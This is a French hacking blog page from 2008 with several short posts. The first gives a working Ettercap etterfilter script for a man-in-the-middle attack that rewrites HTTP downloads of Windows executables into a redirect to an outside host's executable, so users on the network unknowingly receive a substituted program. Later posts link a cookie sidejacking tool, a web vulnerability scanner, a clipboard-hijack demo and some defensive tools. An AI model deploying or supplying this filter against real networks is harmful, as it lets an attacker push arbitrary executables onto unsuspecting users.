jeudi 21 août 2008

Ettercap / etterfilter MIM Any Exe


Voici une démonstration du style Man in the middle, celle ci remplace n'importe exécutoire téléchargé par des Windows par celui qui vous avez définit

Video


Script
# replace rmccurdy with your website
# replace the url with what ever exe you like





if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("keep-alive", "close" ");
replace("Keep-Alive", "close" ");

}



if (ip.proto == TCP && search(DATA.data, ": application") ){
# enable for logging log(DECODED.data, "/tmp/log.log");
msg("found EXE\n");
# "Win32" is the first part of the exe example:
# if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
if (search(DATA.data, "Win32")) {
msg("doing nothing\n");
} else {
replace("200 OK", "301 Moved Permanently
Location: http://www.rmccurdy.com/scripts/quickclean.exe
");
msg("redirect success\n");

}
}

Google comme Proxy


Google comme proxy , ça c'est du proxy de confiance (pour les log) ;)

GooGle-PoXy

mercredi 20 août 2008

Surfjack - Sidejacking


Programme qui intercepte les cookies sur un réseau soit pure Sidejacking

Download
Video-Demo
Autre technique
(Ferret & Hamster)

Grendel-Scan - Scanner de faille Web By DEFCON


Voici un très beau scanner de failles créer par un membre de DEFCON
C'est compatible sous toutes les plateformes :)
Tres complet et pour ne pas prendre une page a montrer ce qu'il fait, je vous laisse y jeter un œil!
Le slide
Download

ArpOn


ArpOn a été créer pour rendre les requetes ARP plus sûr ! (ARP Poisoning/Spoofing attacks).Tres utile si vous vous connecté souvent dans des endroits public! ;)
En gros ,il analyse les paquets ARP et peut les bloqué.

Voici la Doc & le log
(Mac OS X , FreeBSD , NetBSD , OpenBSD and Linux.)


IExplorer/Firefox avec noscript - clipboard hijacks



Firefox même avec nos script ne filtre pas bien le flash,ce qui permet d'avoir accès a votre presse papier

-> Tester ici
(Dans cet exemple, apres avoir visité la page ,faites un" coller" :) !

Références

http://www.trustedsource.org/blog/145/Rogue-Flash-ads-hijack-your-clipboard
http://news.bbc.co.uk/2/hi/technology/7567889.stm
http://www.theregister.co.uk/2008/08/15/webbased_clipboard_hijacking/
http://blogs.pcmag.com/securitywatch/2008/08/mac_users_get_clipboardjacked.php
http://blogs.zdnet.com/security/?p=1733
http://www.scmagazineus.com/Clipboards-hijacked-by-furtive-code/article/115503
http://www.sophos.com/security/blog/2008/08/1671.html?_log_from=rss

-> Source

mardi 19 août 2008

I Love FireFox



Voici les addons que je vous consille pour l'analyse et sécurité
Sécurité
Noscript
Javascripter bloquer
Keyscrambler
Anti-keylloger
Analyse
Tamper data
Analyse de requetes
FireBug
Analyse de page source
FireCookie
Analyse et edition de cookie
Firephp
Analyse du dialogue php
HackBar
Encoder/decoder/splitter ...d'url